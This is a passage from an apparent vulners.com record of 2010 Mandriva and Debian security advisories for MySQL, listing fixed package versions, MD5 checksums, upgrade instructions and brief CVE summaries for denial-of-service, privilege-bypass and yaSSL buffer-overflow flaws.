http://dev.mysql.com/doc/refman/5.1/en/news-5-1-37.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-38.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-39.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-40.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-42.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.1:\r\n 2052354eb2f57325cc5a351aa8e7fa17 2009.1/i586/libmysql16-5.1.42-0.1mdv2009.1.i586.rpm\r\n f8b86535e2b9304340b95fc6b5e5ed53 2009.1/i586/libmysql-devel-5.1.42-0.1mdv2009.1.i586.rpm\r\n 0b2b4f3359a6b44614daf30e921faebf 2009.1/i586/libmysql-static-devel-5.1.42-0.1mdv2009.1.i586.rpm\r\n 0a007a4249e801fcf6ba7112c79e125b 2009.1/i586/mysql-5.1.42-0.1mdv2009.1.i586.rpm\r\n 87664cc60c044a8415d54d4e1169556c 2009.1/i586/mysql-bench-5.1.42-0.1mdv2009.1.i586.rpm\r\n ec0a34be2a2abd3890e3b6163099231b 2009.1/i586/mysql-client-5.1.42-0.1mdv2009.1.i586.rpm\r\n 5f1526147c19c5dac3d5e926e75e6108 2009.1/i586/mysql-common-5.1.42-0.1mdv2009.1.i586.rpm\r\n 53894c10ef4d4e1384d55bf6d957d03b 2009.1/i586/mysql-doc-5.1.42-0.1mdv2009.1.i586.rpm\r\n af10d4d0e4efb516dc8228df3b6e0b04 2009.1/i586/mysql-max-5.1.42-0.1mdv2009.1.i586.rpm\r\n a950628d61d6941c5334040527b187b3 2009.1/i586/mysql-ndb-extra-5.1.42-0.1mdv2009.1.i586.rpm\r\n 5ef3d1368951afda87ce339ac3f40702 2009.1/i586/mysql-ndb-management-5.1.42-0.1mdv2009.1.i586.rpm\r\n 939043e470320d048c61ba731e58eedb 2009.1/i586/mysql-ndb-storage-5.1.42-0.1mdv2009.1.i586.rpm\r\n b575199f57235a93ab35f1d21b09106b 2009.1/i586/mysql-ndb-tools-5.1.42-0.1mdv2009.1.i586.rpm \r\n 7da4fea0d689631b6dc395cd5e80607e 2009.1/SRPMS/mysql-5.1.42-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 83694bc1ab6c44f9ad081a385db8e137 2009.1/x86_64/lib64mysql16-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n efeb723e6c2f03878d3c7a98c70b08fc 2009.1/x86_64/lib64mysql-devel-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 36dd02fdbc2fbb752cee1d5dd80b2687 2009.1/x86_64/lib64mysql-static-devel-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 6d0f276c904e851e94e21fd33064bf84 2009.1/x86_64/mysql-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 783bb174310ca9f2d713f83cf6d1ef88 2009.1/x86_64/mysql-bench-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 4e63f4cc681ea7647a4a6d741b272a5b 2009.1/x86_64/mysql-client-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 0387ea642a706affc7ea43996786995b 2009.1/x86_64/mysql-common-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 57a3b2e0d7f89cf6c529317f96aa175d 2009.1/x86_64/mysql-doc-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 754919090d5355395a2f36025b0a6370 2009.1/x86_64/mysql-max-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n f7b6cff4ab3d2679107c8b5a1f0d1209 2009.1/x86_64/mysql-ndb-extra-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 526aec7bd783d54a9ba354098f88cb53 2009.1/x86_64/mysql-ndb-management-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 5c21900db14347e6e04979e9edeafc7c 2009.1/x86_64/mysql-ndb-storage-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 3011a3d4a3a83b563933909446c4e5a2 2009.1/x86_64/mysql-ndb-tools-5.1.42-0.1mdv2009.1.x86_64.rpm \r\n 7da4fea0d689631b6dc395cd5e80607e 2009.1/SRPMS/mysql-5.1.42-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n d8b966d905db88c7a5f78b350b2d197b 2010.0/i586/libmysql16-5.1.42-0.1mdv2010.0.i586.rpm\r\n 97890a292a3ad4bfbb9a12bbf4526b65 2010.0/i586/libmysql-devel-5.1.42-0.1mdv2010.0.i586.rpm\r\n abdfe57c2b25ff668b9f972efa4bec28 2010.0/i586/libmysql-static-devel-5.1.42-0.1mdv2010.0.i586.rpm\r\n de115ca3e80cb4a54970590eae0caf74 2010.0/i586/mysql-5.1.42-0.1mdv2010.0.i586.rpm\r\n b1af15f0e00bd2824092dac21d28a59d 2010.0/i586/mysql-bench-5.1.42-0.1mdv2010.0.i586.rpm\r\n 67beec0620551eb817d09e4dd2ed32a6 2010.0/i586/mysql-client-5.1.42-0.1mdv2010.0.i586.rpm\r\n e7979f8b6015a750d09593478cfcccc2 2010.0/i586/mysql-common-5.1.42-0.1mdv2010.0.i586.rpm\r\n 1e403dda77399cac91522b99c5a77a94 2010.0/i586/mysql-common-core-5.1.42-0.1mdv2010.0.i586.rpm\r\n c06bcd5a5c0acb43f270f5d7ace9d417 2010.0/i586/mysql-core-5.1.42-0.1mdv2010.0.i586.rpm\r\n 155d7edf8bf7760c644733671d04dda2 2010.0/i586/mysql-doc-5.1.42-0.1mdv2010.0.i586.rpm\r\n 8a7c42ba34efd2f8f1c74491f30bac7c 2010.0/i586/mysql-max-5.1.42-0.1mdv2010.0.i586.rpm\r\n 1d1eb124a30062c8229eacee947fab6b 2010.0/i586/mysql-ndb-extra-5.1.42-0.1mdv2010.0.i586.rpm\r\n e6133a08e26f7983f9cb9b7b67b75ca9 2010.0/i586/mysql-ndb-management-5.1.42-0.1mdv2010.0.i586.rpm\r\n 9372040b6d57968315f459a688a7fdab 2010.0/i586/mysql-ndb-storage-5.1.42-0.1mdv2010.0.i586.rpm\r\n a74218625b766d72ae38c2c1476cf3e6 2010.0/i586/mysql-ndb-tools-5.1.42-0.1mdv2010.0.i586.rpm \r\n ca60b4ffe2c95cb2db29a1a1e2523924 2010.0/SRPMS/mysql-5.1.42-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 2930d2e7a334341d082bdec1c2ad261f 2010.0/x86_64/lib64mysql16-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 8ca967411d87705edcced52cc8281744 2010.0/x86_64/lib64mysql-devel-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 71af52b4b8cd37ec37141fe56b0bea1c 2010.0/x86_64/lib64mysql-static-devel-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n f8ff5f7cdd6054da4c81e3a741d9fb22 2010.0/x86_64/mysql-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 2b7d818a2edd120aba01e525fc51e647 2010.0/x86_64/mysql-bench-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 4896e7cfb9818e740de6586d6de18e8f 2010.0/x86_64/mysql-client-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 7904e902d0dd12a611fef6d4fe74d188 2010.0/x86_64/mysql-common-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 4ad977d5b0a3d8bd29d482f35ee41516 2010.0/x86_64/mysql-common-core-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 72ae82e587c92165a72467e30560b42f 2010.0/x86_64/mysql-core-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 7585cdb1a7065c522d3d71c91c13071f 2010.0/x86_64/mysql-doc-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 50936bad8898af9a9ecbab9f51a884c5 2010.0/x86_64/mysql-max-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 2ef542022c6437fa4df25e7b46c804dd 2010.0/x86_64/mysql-ndb-extra-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n b20519b0f4fb8ca438c8105a1305b45d 2010.0/x86_64/mysql-ndb-management-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 32d5eb57ba08af5420e44777ea2bbd98 2010.0/x86_64/mysql-ndb-storage-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 607848d02f7cffdf3169c7dbce65e75f 2010.0/x86_64/mysql-ndb-tools-5.1.42-0.1mdv2010.0.x86_64.rpm \r\n ca60b4ffe2c95cb2db29a1a1e2523924 2010.0/SRPMS/mysql-5.1.42-0.1mdv2010.0.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLU3VUmqjQ0CJFipgRAmhhAJ91sCoRByeEVFdzAULLmfs0t6vOsACaArA+\r\nfPZMuPMkwgub9aN1Xva9v1Q=\r\n=2/XR\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-01-19T00:00:00", "published": "2010-01-19T00:00:00", "id": "SECURITYVULNS:DOC:23063", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23063", "title": "[ MDVSA-2010:012 ] mysql", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:24:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4019", "CVE-2009-4484"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1997-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nFebruary 14, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : mysql-dfsg-5.0\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-4019 CVE-2009-4030 CVE-2009-4484\n\nSeveral vulnerabilities have been discovered in the MySQL\ndatabase server.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\n\nCVE-2009-4019\n\nDomas Mituzas discovered that mysqld does not properly handle errors during\nexecution of certain SELECT statements with subqueries, and does not preserve\ncertain null_value flags during execution of statements that use the\nGeomFromWKB function, which allows remote authenticated users to cause a\ndenial of service (daemon crash) via a crafted statement.\n\n\nCVE-2009-4030\n\nSergei Golubchik discovered that MySQL allows local users to bypass certain\nprivilege checks by calling CREATE TABLE on a MyISAM table with modified\nDATA DIRECTORY or INDEX DIRECTORY arguments that are originally associated\nwith pathnames without symlinks, and that can point to tables created at\na future time at which a pathname is modified to contain a symlink to a\nsubdirectory of the MySQL data home directory.\n\n\nCVE-2009-4484\n\nMultiple stack-based buffer overflows in the CertDecoder::GetName function\nin src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld, allow\nremote attackers to execute arbitrary code or cause a denial of service\n(memory corruption and daemon crash) by establishing an SSL connection and\nsending an X.509 client certificate with a crafted name field.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 5.0.32-7etch12\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.0.51a-24+lenny3\n\nThe testing (squeeze) and unstable (sid) distribution do not contain\nmysql-dfsg-5 anymore.\n\nWe recommend that you upgrade your mysql-dfsg-5.0 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.dsc\n Size/MD5 checksum: 1128 4887f5693757fbbc2584e86ab5e91bf3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.diff.gz\n Size/MD5 checksum: 315292 3d1c00f7b70032c11803fa391bee026a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz\n Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 48912 f937a118691e4325dac3a5a8e98eeb50\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 55892 6f34fbec1b8e451172ebd24f80439a9e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 46842 daa1649e464ebdbbd54170fb571782ea\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 1947910 6e23852721ab3b2a95d1b3113a533212\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 48900 c53c847af88a0423a09b9f68ba261859\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 8906528 64427684814af516902d10adb5c85de2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 8406242 204adae2eab5bfb665728ea7257631f0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 27248640 ee4b566619b0e560dcbf0632f8b0cc0e\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 1832552 84dba4bf6dfb24e13f4077e04d0c3475\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 25812188 31a0ce355b2c04ac098cf88594903744\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 48892 7af6aaca5c209bc9035be7d70784e9cb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 7549932 60e9a964ad08a8da5b2ea3f9102bead7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 7373492 bcf1f20eb6e6a973348a70628b1f4c4c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 1749396 bdd8b56e6fcd449a95fa84557be2a36c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 48944 a1eefc9dc4f1b06dc273e3a9e8bb15b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 25391008 274f4ba0bc48cbaad699d13f18d890ed\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 7209164 361da5227a960f85c4ff9e7940e0c48c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 6929398 7dd6fa8d51380dbd14733d9a412a22ed\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 8054922 1f896596ed2155bbb303170d5c58c52b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 48944 a588f3af5d0ff21ab4b40c81d1e6fc6c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 27197414 0d83d649dc99199513a1db73707f24f6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 1923360 1cb59886260894b0d22f2a51a192de50\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 8008532 93aaf8278a886dcba497aa9e2bb6293e\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 1795330 545b9a1f38f32aabacec4a5269e0aef4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 7193656 1755e4d988b95b31afdac22af89b8336\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 48944 6f8c556248dfb80e251bb4985b266a8a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 25359554 03d2005576588e2c02274fcffe42d955\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 6976660 97d2e827f13ed9d35fce8467ca2b9efa\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 9740464 ab1ab10891736c731e456a3b177a2312\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 10344966 66e944be1b43f145243c27f57850d196\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 48896 57f5afd3c27d68ba80a8739c5604095c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 30405338 3dda87502fa124a4a5d5005c81e738c4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 2116718 da6a3ae401c77062478f2fd020435d29\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 25849668 0c94d38f290a9ed10a2edbe5ea3e741b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 48902 0c47a91385eef6956f214bfb22ed1b48\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 7643768 e2b5b36f68cef57f9311723496b159b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 7565666 08d656eaee1e93290058e63f90b11fd6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 1790838 5a763673b2f69c5c7b99093f83dca05e\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 7526456 177c37f69f3b0ac0b0190a1f6b30974d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 48952 4043f7b2094834103a474398a8662dcc\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 26316574 fb4938e1a2d923c61e4a7d022fd09453\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 7572330 24a85e6c00e7706cd0d86be06aa2b4df\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 1832552 fe2b6a7aa7655f4dd3533256e1d6c1cd\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 7016770 3e210b7a8f29c3249debffb84925cccb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 25549876 c93a3c01ad19a0c1ee67f2735d27ddf2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 48892 17f1009dbde6d24660ece46896a4e3c7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 7162030 5dcf1cdc5747381a87d983ffd785131e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 1798414 c2a754cb9699ed08630984d32a0e0681\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.dsc\n Size/MD5 checksum: 1746 e2f47c4a8b255f1ecebfca3416a9bd06\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a.orig.tar.gz\n Size/MD5 checksum: 17946664 6fae978908ad5eb790fa3f24f16dadba\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.diff.gz\n Size/MD5 checksum: 379840 3383e2cd99f1a1108d9afc942ada9234\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 61638 f95c22084e5fe701749eb775dcb72fca\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 55124 4ace4e9ed13e673babf77e095f732fc3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 52928 9c459e3fd6a4d26d61ebd53c6ff59fc2\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 2017374 9cfa50e93ff4eb076c4b279db28590b2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 28323504 497b285f781bab661e872958db2706fa\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 8921890 69a8ae8d4b8c65ba91ccd0f85c974eb3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 9069206 210e61b74049dd98ac2ac22d35cf87bf\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 27159426 5969018772991a4d3ec674a892f3eca3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 8207634 de959e4ec57baeb625a1b787957f1b4e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 7586020 5c3999c91d005b454e2b186c57d05532\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 1905900 16f42105a813df0dc3ff86310bd617db\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 26217720 8ac12229994f083d8d0fe61e7b21447c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 7255210 1411c1f593184806f334c5115d5e5b1e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 1783326 4939777b25fdcf7d2dc5512cfe79e45a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 7647988 0b5878b88bbbdccb50191c1624c9430e\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 8429602 dd8e26cc1d2dc822570645ea76bb8c8e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 27882774 27f249a50e587c912e9c981257971c07\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 8167562 758f37139ed34abcb8c6b73f481e7883\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 1959060 6991ac7e53bc11c32f72a2fddb4bc7e1\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 7200822 2e2aaa0abb27d2704b40595faac5b483\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 1860538 f50bcc91b4aa22b2861cd9e7d672aa16\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 26654932 0bbb282a6496724b9113e84bb3af8d58\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 7785150 d0feb6f30b7aa4a8225ffd3e3fcb536f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 2186408 287a20525b59ac1fd1f0164dabc01fde\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 9933436 edd18fc5e20ed97d9b42b64427dde5a4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 10914030 9bd4e889ddf9d3794629bf3bd644e28d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 31432284 5d78f5b72f7e105598c2ff77d3336986\n\nmipsel architecture (MIPS 